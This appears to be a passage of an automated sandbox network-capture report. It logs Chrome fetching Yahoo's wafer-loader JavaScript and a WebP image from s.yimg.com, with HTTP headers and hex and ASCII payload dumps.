                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1070INData Raw: b7 54 e3 ca fb f8 2a 6c 89 0f 54 c3 4b cf 70 6a 5c ad 48 0f dc b3 1a 2c 5c 35 3b 40 b4 02 4a ea 84 27 1f dd 40 4e 30 45 d2 5d ac 7b 30 1a f6 5d c4 d0 db 5b 11 1e e0 ad 42 f0 fe a9 64 d1 15 91 00 9c 11 f9 c4 e5 a4 4d a6 ae 69 0c e4 81 51 93 12 0b fe a2 07 ef 77 7f 25 a1 a3 44 46 61 6c 64 ca b3 99 25 9b b8 08 89 8b 2f ef f2 76 d3 9d c8 08 89 3f e1 16 25 a5 d2 de 97 7a 0e a9 3d 90 4a f7 ec 43 80 00 04 ac 61 60 43 9d a6 28 6a 96 05 70 95 3f be ce eb 0e b4 af 60 fb c1 fc 84 7a 5b e9 d3 13 e5 a4 ff da 73 a2 26 30 17 00 e0 62 df 0c 1e 0f 23 c0 69 3e b4 93 27 93 33 67 eb 69 fd 86 48 49 47 6c e4 e8 b5 6f 26 4a aa 7e bd 5e 33 c5 30 4c c1 70 38 9b 05 d4 11 03 6a 8e bc 39 5d b3 a6 9e 21 98 3b c0 ab f0 53 9d df 87 13 44 fa cf 22 aa 25 0e 3d aa 8f 13 ba 88 fb 80 e7 85
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: T*lTKpj\H,\5;@J'@N0E]{0][BdMiQw%DFald%/v?%z=JCa`C(jp?`z[s&0b#i>'3giHIGlo&J~^30Lp8j9]!;SD"%=


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    49192.168.2.44980987.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC367OUTGET /aaq/wf/wf-loader-2.7.21-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: ZaEwJ32cmYPbMLp888MUsXr484f4oIU+5WEkp8UjCK5rRKkMFanj6z4gyDHBWBC4psRz1BobKKU=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: EZAB3MX781SQV93Z
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Wed, 25 Sep 2024 20:59:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 16 Sep 2024 04:28:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "59ae89307f6be51355e07acf3994f79b"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: ODQdcT.d6AiA15hD8NatovEvfsHYFam9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 11901
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 418919
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 61 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 6c 6f 61 64 65 72 22 2c 5b 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 6c 6f 61 64 65 72 22 5d 3d 65 28 29 3a 28 61 2e 77 61 66 65 72 3d 61 2e 77 61 66 65 72 7c 7c 7b 7d 2c 61 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 61 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(a,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-loader",[],e):"object"==typeof exports?exports["wafer-loader"]=e():(a.wafer=a.wafer||{},a.wafer.wafers=a.wafer.wafers||
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 61 63 74 69 6f 6e 2d 31 2e 38 2e 31 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 61 63 74 69 6f 6e 2d 31 2e 38 2e 31 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 33 31 2e 38 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 31 2e 33 31 2e 38 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 31 2e 33 31 2e 38 2d 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 61 75 74 6f 63 6f 6d 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: :"/aaq/wf/wf-action-1.8.1.js",raw:"/aaq/wf/wf-action-1.8.1.raw.js"}},"wafer-autocomplete":{meta:{version:"1.31.8"},modern:{min:"/aaq/wf/wf-autocomplete-1.31.8-modern.js",raw:"/aaq/wf/wf-autocomplete-1.31.8-modern.raw.js"},default:{min:"/aaq/wf/wf-autocomp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 2d 31 2e 30 2e 32 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 2d 31 2e 30 2e 32 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 63 6f 72 65 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 36 35 2e 31 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 63 6f 72 65 2d 31 2e 36 35 2e 31 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 63 6f 72 65 2d 31 2e 36 35 2e 31 2d 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: js"},default:{min:"/aaq/wf/wf-clipboard-copy-1.0.2.js",raw:"/aaq/wf/wf-clipboard-copy-1.0.2.raw.js"}},"wafer-core":{meta:{version:"1.65.1"},modern:{min:"/aaq/wf/wf-core-1.65.1-modern.js",raw:"/aaq/wf/wf-core-1.65.1-modern.raw.js"},default:{min:"/aaq/wf/wf
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 64 72 6f 70 64 6f 77 6e 2d 64 72 61 77 65 72 2d 31 2e 31 2e 33 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 64 72 6f 70 64 6f 77 6e 2d 64 72 61 77 65 72 2d 31 2e 31 2e 33 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 65 78 70 65 72 69 6d 65 6e 74 2d 73 63 72 6f 6c 6c 76 69 65 77 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 32 2e 31 30 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 65 78 70 65 72 69 6d 65 6e 74 2d 73 63 72 6f 6c 6c 76 69 65 77 2d 31 2e 32 2e 31 30 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 65 78 70 65 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: modern.raw.js"},default:{min:"/aaq/wf/wf-dropdown-drawer-1.1.3.js",raw:"/aaq/wf/wf-dropdown-drawer-1.1.3.raw.js"}},"wafer-experiment-scrollview":{meta:{version:"1.2.10"},modern:{min:"/aaq/wf/wf-experiment-scrollview-1.2.10-modern.js",raw:"/aaq/wf/wf-exper
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 34 2e 30 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 69 6d 61 67 65 2d 31 2e 34 2e 30 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 69 6d 61 67 65 2d 31 2e 34 2e 30 2d 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 69 6d 61 67 65 2d 31 2e 34 2e 30 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 69 6d 61 67 65 2d 31 2e 34 2e 30 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 6c 69 67 68 74 62 6f 78 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 31 30 2e 36 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {version:"1.4.0"},modern:{min:"/aaq/wf/wf-image-1.4.0-modern.js",raw:"/aaq/wf/wf-image-1.4.0-modern.raw.js"},default:{min:"/aaq/wf/wf-image-1.4.0.js",raw:"/aaq/wf/wf-image-1.4.0.raw.js"}},"wafer-lightbox":{meta:{version:"1.10.6"},modern:{min:"/aaq/wf/wf-l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6e 61 74 69 76 65 2d 64 61 2d 31 2e 30 2e 35 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6e 61 74 69 76 65 2d 64 61 2d 31 2e 30 2e 35 2d 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6e 61 74 69 76 65 2d 64 61 2d 31 2e 30 2e 35 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6e 61 74 69 76 65 2d 64 61 2d 31 2e 30 2e 35 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 70 72 6f 67 72 65 73 73 2d 6c 6f 61 64 65 72 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 32 2e 31 30 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: n:{min:"/aaq/wf/wf-native-da-1.0.5-modern.js",raw:"/aaq/wf/wf-native-da-1.0.5-modern.raw.js"},default:{min:"/aaq/wf/wf-native-da-1.0.5.js",raw:"/aaq/wf/wf-native-da-1.0.5.raw.js"}},"wafer-progress-loader":{meta:{version:"1.2.10"},modern:{min:"/aaq/wf/wf-p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 2e 31 32 2e 36 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 74 65 6d 70 6c 61 74 65 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 34 2e 33 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 74 65 6d 70 6c 61 74 65 2d 31 2e 34 2e 33 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 74 65 6d 70 6c 61 74 65 2d 31 2e 34 2e 33 2d 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 74 65 6d 70 6c 61 74 65 2d 31 2e 34 2e 33 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 74 65 6d 70 6c 61 74 65 2d 31 2e 34 2e 33 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 74 65 78 74 22 3a 7b 6d 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: .12.6.raw.js"}},"wafer-template":{meta:{version:"1.4.3"},modern:{min:"/aaq/wf/wf-template-1.4.3-modern.js",raw:"/aaq/wf/wf-template-1.4.3-modern.raw.js"},default:{min:"/aaq/wf/wf-template-1.4.3.js",raw:"/aaq/wf/wf-template-1.4.3.raw.js"}},"wafer-text":{me
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 6f 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 33 2e 32 2e 32 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 76 69 64 65 6f 2d 33 2e 32 2e 32 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 76 69 64 65 6f 2d 33 2e 32 2e 32 2d 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 76 69 64 65 6f 2d 33 2e 32 2e 32 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 76 69 64 65 6f 2d 33 2e 32 2e 32 2e 72 61 77 2e 6a 73 22 7d 7d 7d 7d 2c 22 2e 2f 73 72 63 2f 65 6e 74 72 79 2e 6a 73 22 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 65 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: o":{meta:{version:"3.2.2"},modern:{min:"/aaq/wf/wf-video-3.2.2-modern.js",raw:"/aaq/wf/wf-video-3.2.2-modern.raw.js"},default:{min:"/aaq/wf/wf-video-3.2.2.js",raw:"/aaq/wf/wf-video-3.2.2.raw.js"}}}},"./src/entry.js":function(a,e,r){"use strict";function w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 65 72 6e 3a 21 30 2c 73 75 63 63 65 73 73 43 6c 61 73 73 3a 69 7d 2c 72 6f 6f 74 3a 73 7d 2c 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 6c 6f 61 64 57 61 66 65 72 73 46 6f 72 57 72 61 70 70 65 72 45 6c 65 6d 28 64 6f 63 75 6d 65 6e 74 29 7d 2c 30 29 7d 29 2c 74 68 69 73 2e 73 79 6e 63 28 29 7d 72 65 74 75 72 6e 20 66 28 61 2c 5b 7b 6b 65 79 3a 22 6c 6f 61 64 57 61 66 65 72 73 46 6f 72 57 72 61 70 70 65 72 45 6c 65 6d 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 72 3d 5b 5d 3b 6a 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 77 29 7b 76 61 72 20 66 3d 6c 5b 77 5d 7c 7c 77 2c 6f 3d 77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ern:!0,successClass:i},root:s},window.wafer.ready(function(){setTimeout(function(){e.loadWafersForWrapperElem(document)},0)}),this.sync()}return f(a,[{key:"loadWafersForWrapperElem",value:function(a){var e=this,r=[];j.forEach(function(w){var f=l[w]||w,o=w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC201INData Raw: 65 74 28 6c 29 29 72 65 74 75 72 6e 20 76 6f 69 64 20 6f 28 29 3b 65 5b 72 5d 3d 21 30 2c 6e 2e 5f 61 73 73 65 74 4c 6f 61 64 65 64 4d 61 70 70 69 6e 67 2e 73 65 74 28 6c 2c 21 30 29 2c 69 28 7b 73 72 63 3a 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 22 2b 6c 7d 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 65 5b 72 5d 3d 21 31 2c 61 29 72 65 74 75 72 6e 20 76 6f 69 64 20 73 28 61 29 3b 6f 28 29 7d 29 7d 29 7d 29 29 7d 7d 5d 29 2c 61 7d 28 29 2c 70 3d 71 3b 65 2e 64 65 66 61 75 6c 74 3d 6e 65 77 20 70 28 7b 73 65 6c 65 63 74 6f 72 3a 22 2e 77 61 66 65 72 22 7d 29 7d 7d 29 7d 29 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: et(l))return void o();e[r]=!0,n._assetLoadedMapping.set(l,!0),i({src:"https://s.yimg.com"+l},function(a){if(e[r]=!1,a)return void s(a);o()})})}))}}]),a}(),p=q;e.default=new p({selector:".wafer"})}})});


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    50192.168.2.44981187.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC763OUTGET /uu/api/res/1.2/tQ8F_aqdd1MTiJBsUnvEUw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/35a87f10-7eff-11ef-b37e-1db661b209fc.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1005INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 6620
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Disposition: inline; filename="35a87f10-7eff-11ef-b37e-1db661b209fc.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Etag: "39b1bc24d49268fbb6fd0ed2211bc2c3"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 30 Sep 2024 07:40:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Request-Id: 4bb9e8c9017c16cc709a0afc370810d5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 07:45:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server-Timing: cld-fastly;mitm=po;dur=2;cpu=0;start=2024-09-30T07:45:15.651Z;desc=hit,rtt;dur=89,content-info;desc="width=356,height=180,bytes=6620,owidth=4110,oheight=2740,obytes=2507252,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 34543
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 52 49 46 46 d4 19 00 00 57 45 42 50 56 50 38 20 c8 19 00 00 d0 9f 00 9d 01 2a 64 01 b4 00 3e 79 34 96 48 24 a2 a2 25 a9 51 0d 48 b0 0f 09 63 6d a5 37 3c 6c c6 b5 67 82 0e 3d f9 ce 77 fd 6b eb 59 58 02 ae 11 db 8a 6e f6 69 77 66 04 de 50 2c f7 df 0d ea a2 bc 1d f1 0a 18 ee 9b 38 0e b7 a7 5d 0c 31 bf 26 dc 0c bd 0d fc 1f 53 b2 35 b4 17 ac a1 07 8c fd 9a 87 76 2d 89 c1 bb d9 c2 82 50 f1 de 24 28 1a de e0 2a 88 48 58 52 ae 69 dd a7 e2 41 69 0e 6a 15 3a 61 fa 3c dd e2 f5 59 ff 36 9c 53 e2 04 38 94 6a 78 13 87 b4 60 d7 84 b4 e5 71 35 01 05 2f 1b 87 5e 82 37 c5 cd 2a fb 6c 72 5d 9a 32 30 a3 64 ea 7b 6a 5b 42 11 1b 03 d5 4f fb 1a 22 a8 a3 20 17 97 5f e8 a4 07 80 0f 0d 89 54 4e 1d 33 0a b8 cf 0a 36 2f 01 ff 20 e2 a1 e4 7f 83 80 d4 89 68 8c 39 58 c9 1b f3 3b e2 12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: RIFFWEBPVP8 *d>y4H$%QHcm7<lg=wkYXniwfP,8]1&S5v-P$(*HXRiAij:a<Y6S8jx`q5/^7*lr]20d{j[BO" _TN36/ h9X;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: c2 3d e9 b8 df 7f 90 00 fe 70 29 34 59 88 ce 41 39 3e 90 ad 1e 9b 9f df f1 85 83 8b 66 68 61 ae 54 9c b8 7b a4 74 90 37 e4 ae 73 67 c9 21 be b0 26 76 28 ac 7f 06 68 b7 27 6e 4f 37 6c 8b fd 32 4f 8e 8e ee 28 d3 7e 79 8b fb 12 10 9a e6 1e 3e 2e 21 8e a5 ec 68 10 7f bc de 47 33 c4 48 2e ad 0f 59 7d 62 76 46 5d 87 af 27 c9 2e bd f7 8b aa 43 39 30 46 82 a8 43 d1 0c 1d 6b 8b 92 47 ea 49 04 20 9d 72 57 0c ce 4a 85 bd ca 02 be 51 b8 87 e4 8d 18 01 9a 56 af 6f 37 0f 5c 93 7c 57 f0 84 e7 5f c0 e7 1f 34 0f ae 81 cd 2f ba 29 41 04 d8 11 46 20 ec 5c ea 56 6c cc c4 34 c8 5e 00 67 cc c8 96 51 85 8f b1 d7 bc a5 10 95 61 70 06 b3 48 e9 f1 52 fc 76 e3 d3 40 13 35 d8 d1 f8 80 24 5f dd 6b 0e 24 e0 06 a3 1d ab d0 14 13 99 f3 c5 12 00 03 9f b5 2d 73 22 d3 f3 68 b8 d5 8c 5c 7b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: =p)4YA9>fhaT{t7sg!&v(h'nO7l2O(~y>.!hG3H.Y}bvF]'.C90FCkGI rWJQVo7\|W_4/)AF \Vl4^gQapHRv@5$_k$-s"h\{
